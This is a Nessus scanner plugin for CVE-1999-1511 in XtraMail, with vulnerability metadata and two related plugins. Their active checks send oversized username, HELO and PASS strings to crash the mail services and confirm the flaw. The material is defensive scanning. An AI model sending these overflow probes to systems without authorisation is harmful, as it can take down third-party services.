ID XTRAMAIL_CONTROL.NASL Type nessus Reporter This script is Copyright (C) 1999-2018 Tenable Network Security, Inc. Modified 2021-01-02T00:00:00
Description
The remote host is running a version of XtraMail with a remote buffer
overflow vulnerability. XtraMail includes a remote administration
utility which listens on port 32000 for logins. Providing a username
of over 15,000 characters causes a buffer overflow, which could allow
a remote attacker to crash the service or potentially execute
arbitrary code.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
# Registration block: when the engine loads the plugin with `description`
# set, only the metadata below is recorded and the script exits before any
# network activity takes place.
if (description)
{
# Plugin identity and the advisories this check is tied to.
script_id(10323);
script_version("1.36");
script_cvs_date("Date: 2018/11/15 20:50:24");
script_cve_id("CVE-1999-1511");
script_bugtraq_id(791);
script_name(english:"XtraMail Control Service Username Overflow");
script_summary(english:"Attempts to crash the remote mail server");
# Report text shown to the operator (synopsis, description, reference, fix).
script_set_attribute(attribute:"synopsis", value:
"The remote host is running a mail server with a remote buffer overflow
vulnerability.");
script_set_attribute(attribute:"description", value:
"The remote host is running a version of XtraMail with a remote buffer
overflow vulnerability. XtraMail includes a remote administration
utility which listens on port 32000 for logins. Providing a username
of over 15,000 characters causes a buffer overflow, which could allow
a remote attacker to crash the service or potentially execute
arbitrary code.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Nov/128");
script_set_attribute(attribute:"solution", value:"Upgrade to the latest version of the software.");
# CVSS v2 base vector: network reachable, low complexity, no authentication,
# partial impact on confidentiality, integrity and availability.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
# CVSS v2 temporal vector: exploitability unproven, official fix, report confirmed.
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"1999/11/10");
script_set_attribute(attribute:"plugin_publication_date", value:"1999/11/10");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_family(english:"Misc.");
# Mixed category: the script has a banner-only path (taken when safe_checks()
# is true) and an active path that sends the oversized username and may take
# the service down. Scan policies should treat it as potentially disruptive.
script_category(ACT_MIXED_ATTACK); # mixed
script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
# Plugins scheduled before this one.
# NOTE(review): nothing in this script reads a result from sendmail_expn.nasl;
# confirm whether that dependency is still needed for the port 32000 check.
script_dependencie("find_service1.nasl", "sendmail_expn.nasl");
# Same fixed port that the checks below hard-code in `port`.
script_require_ports(32000);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
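# The XtraMail control (remote administration) service is probed on a fixed
# port; this script does not look the port up in the knowledge base.
port = 32000;

# Safe-checks path: nothing oversized is sent. The verdict rests only on the
# version string in the greeting, so it is wrong whenever the banner has been
# customised or a fix was applied without a version change. The report text
# says so explicitly.
if (safe_checks())
{
  if (!get_port_state(port)) exit(0);

  soc = open_sock_tcp(port);
  if (!soc) exit(0);

  banner = recv_line(socket:soc, length:4096);
  close(soc);

  if (banner)
  {
    b = tolower(banner);
    if ("xtramail" >< b)
    {
      # Flag versions 1.0 through 1.11.
      # The leading "1" must not follow a digit or a dot, otherwise fragments
      # such as "11.5" or the tail of a dotted address ("...168.1.5") in the
      # greeting would be read as version 1.5 and reported.
      # The version may also end the string: if the line terminator is
      # stripped before matching, a banner ending in "1.11" would otherwise
      # be missed (presumably engine dependent; verify against a real banner).
      if (ereg(pattern:"^(.*[^0-9.])?1\.([0-9]|1[0-1])([^0-9].*)?$",
               string:b))
      {
        data = "
Nessus reports this vulnerability using only information that was
gathered. Use caution when testing without safe checks enabled.";
        security_hole(port:port, extra: data);
      }
    }
  }
  exit(0);
}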
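# Active path, reached only when safe_checks() is false (the safe-checks
# branch above always exits). It sends the oversized username and can take a
# vulnerable service down, so it is additionally gated on paranoid reporting.
if (report_paranoia < 2) audit(AUDIT_PARANOID);

if (get_port_state(port))
{
  soc = open_sock_tcp(port);
  if (soc)
  {
    # Require a greeting first, so a silent or unrelated listener on this
    # port is not probed. Release the socket before leaving.
    s = recv_line(socket:soc, length:1024);
    if (!s)
    {
      close(soc);
      exit(0);
    }

    c = string("Username: ", crap(15000), "\r\n");
    send(socket:soc, data:c);
    s = recv_line(socket:soc, length:1024);
    close(soc);

    if (!s)
    {
      # A missing reply alone is weak evidence: a timeout, or a server that
      # silently discards the overlong line, looks the same. Reconnect and
      # report only if the service no longer greets, which is the same
      # confirmation XTRAMAIL_HELO.NASL performs.
      # NOTE(review): a build that drops only the offending connection and
      # keeps listening is not reported by this confirmation; verify against
      # an affected version if that behaviour is possible.
      soc = open_sock_tcp(port);
      if (soc)
      {
        s = recv_line(socket:soc, length:1024);
        close(soc);
      }
      else s = NULL;

      if (!s) security_hole(port);
    }
  }
}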
{"id": "XTRAMAIL_CONTROL.NASL", "bulletinFamily": "scanner", "title": "XtraMail Control Service Username Overflow", "description": "The remote host is running a version of XtraMail with a remote buffer\noverflow vulnerability. XtraMail includes a remote administration\nutility which listens on port 32000 for logins. Providing a username\nof over 15,000 characters causes a buffer overflow, which could allow\na remote attacker to crash the service or potentially execute\narbitrary code.", "published": "1999-11-10T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/10323", "reporter": "This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.", "references": ["https://seclists.org/bugtraq/1999/Nov/128"], "cvelist": ["CVE-1999-1511"], "type": "nessus", "lastseen": "2021-01-01T07:01:17", "edition": 24, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-1999-1511"]}, {"type": "osvdb", "idList": ["OSVDB:252", "OSVDB:251", "OSVDB:253"]}, {"type": "nessus", "idList": ["XTRAMAIL_HELO.NASL", "XTRAMAIL_POP_OVERFLOW.NASL"]}], "modified": "2021-01-01T07:01:17", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-01-01T07:01:17", "rev": 2}, "vulnersScore": 7.5}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10323);\n script_version(\"1.36\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-1999-1511\");\n script_bugtraq_id(791);\n\n script_name(english:\"XtraMail Control Service Username Overflow\");\n script_summary(english:\"Attempts to crash the remote mail server\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a mail server with a remote buffer overflow\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is 
running a version of XtraMail with a remote buffer\noverflow vulnerability. XtraMail includes a remote administration\nutility which listens on port 32000 for logins. Providing a username\nof over 15,000 characters causes a buffer overflow, which could allow\na remote attacker to crash the service or potentially execute\narbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/1999/Nov/128\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to the latest version of the software.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"1999/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"1999/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_family(english:\"Misc.\");\n script_category(ACT_MIXED_ATTACK); # mixed\n script_copyright(english:\"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.\");\n\n script_dependencie(\"find_service1.nasl\", \"sendmail_expn.nasl\");\n script_require_ports(32000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\n\nport = 32000;\n\nif(safe_checks())\n{\n if(!get_port_state(port))exit(0);\n soc = open_sock_tcp(port);\n if(!soc)exit(0);\n banner = recv_line(socket:soc, length:4096);\n close(soc);\n if(banner)\n {\n b = tolower(banner);\n if(\"xtramail\" >< b)\n {\n if( ereg(pattern:\".*1\\.([0-9]|1[0-1])[^0-9].*\",\n \tstring:b)\n )\n {\n data = \"\nNessus reports this vulnerability using only information that was\ngathered. 
Use caution when testing without safe checks enabled.\";\n security_hole(port:port, extra: data);\n }\n }\n }\n exit(0);\n}\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif(get_port_state(port))\n{\n soc = open_sock_tcp(port);\n if(soc)\n {\n s = recv_line(socket:soc, length:1024);\n if ( ! s ) exit(0);\n c = string(\"Username: \", crap(15000), \"\\r\\n\");\n send(socket:soc, data:c);\n s = recv_line(socket:soc, length:1024);\n if(!s)security_hole(port);\n close(soc);\n }\n}\n", "naslFamily": "Misc.", "pluginID": "10323", "cpe": [], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:36:56", "description": "Buffer overflows in Xtramail 1.11 allow attackers to cause a denial of service (crash) and possibly execute arbitrary commands via (1) a long PASS command in the POP3 service, (2) a long HELO command in the SMTP service, or (3) a long user name in the Control Service.", "edition": 3, "cvss3": {}, "published": "1999-11-10T05:00:00", "title": "CVE-1999-1511", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-1511"], "modified": "2017-12-19T02:29:00", "cpe": ["cpe:/a:artisoft:xtramail:1.11"], "id": "CVE-1999-1511", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1511", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:artisoft:xtramail:1.11:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-1999-1511"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nSnort Signature ID: 1636\nSnort Signature ID: 1634\n[CVE-1999-1511](https://vulners.com/cve/CVE-1999-1511)\nBugtraq ID: 791\n", "modified": "1999-11-10T00:00:00", "published": "1999-11-10T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:251", "id": "OSVDB:251", "type": "osvdb", "title": "Artisoft XtraMail Control Service Username Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", 
"cvelist": ["CVE-1999-1511"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[CVE-1999-1511](https://vulners.com/cve/CVE-1999-1511)\nBugtraq ID: 791\n", "modified": "1999-11-10T00:00:00", "published": "1999-11-10T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:252", "id": "OSVDB:252", "type": "osvdb", "title": "Artisoft XtraMail SMTP HELO Command Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-1999-1511"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nSnort Signature ID: 1636\nSnort Signature ID: 1634\n[CVE-1999-1511](https://vulners.com/cve/CVE-1999-1511)\nBugtraq ID: 791\n", "modified": "1999-11-10T00:00:00", "published": "1999-11-10T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:253", "id": "OSVDB:253", "type": "osvdb", "title": "Artisoft XtraMail POP3 PASS Command Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-01T07:01:17", "description": "The remote host is running a version of XtraMail with a remote buffer\noverflow vulnerability. The overflow is caused by by issuing the\n'HELO' command, followed by a long argument.\n\nThe HELO command is typically one of the first commands required by a\nmail server. The command is used by the mail server as a first attempt\nto allow the client to identify itself. 
As such, this command occurs\nbefore there is any authentication or validation of mailboxes, etc.\n\nThis issue may allow an attacker to crash the mail server, or possibly\nexecute arbitrary code.", "edition": 25, "published": "1999-11-10T00:00:00", "title": "XtraMail SMTP HELO Command Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-1511"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "XTRAMAIL_HELO.NASL", "href": "https://www.tenable.com/plugins/nessus/10324", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Script audit and contributions from Carmichael Security\n# Erik Anderson <eanders@carmichaelsecurity.com> (nb: domain no longer exists)\n# Added BugtraqID and CAN\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10324);\n script_version(\"1.42\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-1999-1511\");\n script_bugtraq_id(791);\n\n script_name(english:\"XtraMail SMTP HELO Command Remote Overflow\");\n script_summary(english:\"Attempts to overflow the HELO buffer\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a mail server with a remote buffer overflow\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of XtraMail with a remote buffer\noverflow vulnerability. The overflow is caused by by issuing the\n'HELO' command, followed by a long argument.\n\nThe HELO command is typically one of the first commands required by a\nmail server. The command is used by the mail server as a first attempt\nto allow the client to identify itself. 
As such, this command occurs\nbefore there is any authentication or validation of mailboxes, etc.\n\nThis issue may allow an attacker to crash the mail server, or possibly\nexecute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/1999/Nov/128\");\n script_set_attribute(attribute:\"solution\", value:\"Contact the vendor for a patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"1999/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"1999/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK);\n\n script_copyright(english:\"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SMTP problems\");\n\n script_dependencie(\"smtpserver_detect.nasl\", \"sendmail_expn.nasl\", \"slmail_helo.nasl\", \"csm_helo.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nport = get_service(svc:\"smtp\", default: 25, exit_on_fail: 1);\nif (get_kb_item('SMTP/'+port+'/broken')) exit(0);\n\nif(safe_checks())\n{\n banner = get_smtp_banner(port:port);\n if(banner)\n {\n b = tolower(banner);\n if(\"xtramail\" >< b)\n {\n if( egrep(pattern:\".*1\\.([0-9]|1[0-1])[^0-9].*\",\n \tstring:b)\n )\n {\n data = \"\nNessus reports this vulnerability using only information that was\ngathered. 
Use caution when testing without safe checks enabled.\";\n security_hole(port:port, extra: data);\n }\n }\n }\n exit(0);\n}\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nkey = get_kb_item(string(\"SMTP/\", port, \"/helo_overflow\"));\nif (key) exit(0);\nsoc = open_sock_tcp(port);\nif (! soc) exit(1);\n\n s = smtp_recv_banner(socket:soc);\n if(!s)exit(0);\n if(!(\"220 \" >< s)){\n \tclose(soc);\n\texit(0);\n\t}\nc = 'HELO ' + crap(15000) + '\\r\\n';\n send(socket:soc, data:c);\n s = recv_line(socket:soc, length:1024);\n if(!s)\n {\n close(soc);\n soc = open_sock_tcp(port);\n if(soc) s = smtp_recv_banner(socket:soc);\n else s = NULL;\n if(!s)security_hole(port);\n }\n close(soc);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T07:01:17", "description": "The remote POP3 server is vulnerable to the following buffer overflow :\n\n USER test PASS <buffer>\n\nThis may allow an attacker to execute arbitrary commands as root on\nthe remote POP3 server.", "edition": 24, "published": "1999-11-10T00:00:00", "title": "XtraMail POP3 PASS Command Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-1511"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "XTRAMAIL_POP_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/10325", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10325);\n script_version(\"1.48\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-1999-1511\");\n script_bugtraq_id(791);\n\n script_name(english:\"XtraMail POP3 PASS Command Remote Overflow\");\n script_summary(english:\"Attempts to overflow the in.pop3d buffers\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a mail server with a remote buffer overflow\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote POP3 server is vulnerable 
to the following buffer overflow :\n\n USER test PASS <buffer>\n\nThis may allow an attacker to execute arbitrary commands as root on\nthe remote POP3 server.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/1999/Nov/128\");\n script_set_attribute(attribute:\"solution\", value:\"Contact the vendor for the latest update.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"1999/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"1999/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK);\n\n script_copyright(english:\"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gain a shell remotely\");\n\n script_dependencie(\"find_service1.nasl\", \"qpopper.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/pop3\", 110);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nport = get_service(svc:\"pop3\", default: 110, exit_on_fail: 1);\nfake = get_kb_item(\"pop3/\"+port+\"/false_pop3\");\nif(fake)exit(0);\n\nif(safe_checks())\n{\n banner = get_kb_item(string(\"pop3/banner/\", port));\n if(!banner){\n \t\tsoc = open_sock_tcp(port);\n if(!soc)exit(0);\n\t\tbanner = recv_line(socket:soc, length:4096);\n\t\tif ( ! 
banner ) exit(0);\n\t\tclose(soc);\n\t\tif (substr(banner,0,2) != '+OK') exit(0);\t# Not a POP3 server!\n\t }\n if(banner)\n {\n b = tolower(banner);\n if(\"xtramail\" >< b)\n {\n if( ereg(pattern:\".*1\\.([0-9]|1[0-1])[^0-9].*\",\n \tstring:b)\n )\n {\n data = \"\nreports this vulnerability using only information that was gathered.\nUse caution when testing without safe checks enabled.\";\n security_hole(port:port, extra:data);\n }\n }\n }\n exit(0);\n}\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif(get_port_state(port))\n{\n soc = open_sock_tcp(port);\n if(soc)\n {\n r = recv_line(socket:soc, length:4096);\n if(!r)exit(0);\n\n c = string(\"USER test\\r\\n\");\n send(socket:soc, data:c);\n d = recv_line(socket:soc, length:1024);\n c = string(\"PASS \", crap(2000), \"\\r\\n\");\n send(socket:soc, data:c);\n d = recv_line(socket:soc, length:1024, timeout:15);\n close(soc);\n\n soc = open_sock_tcp(port);\n if(soc)\n {\n r = recv_line(socket:soc, length:4096);\n if(!r)security_hole(port);\n }\n else\n security_hole(port);\n }\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}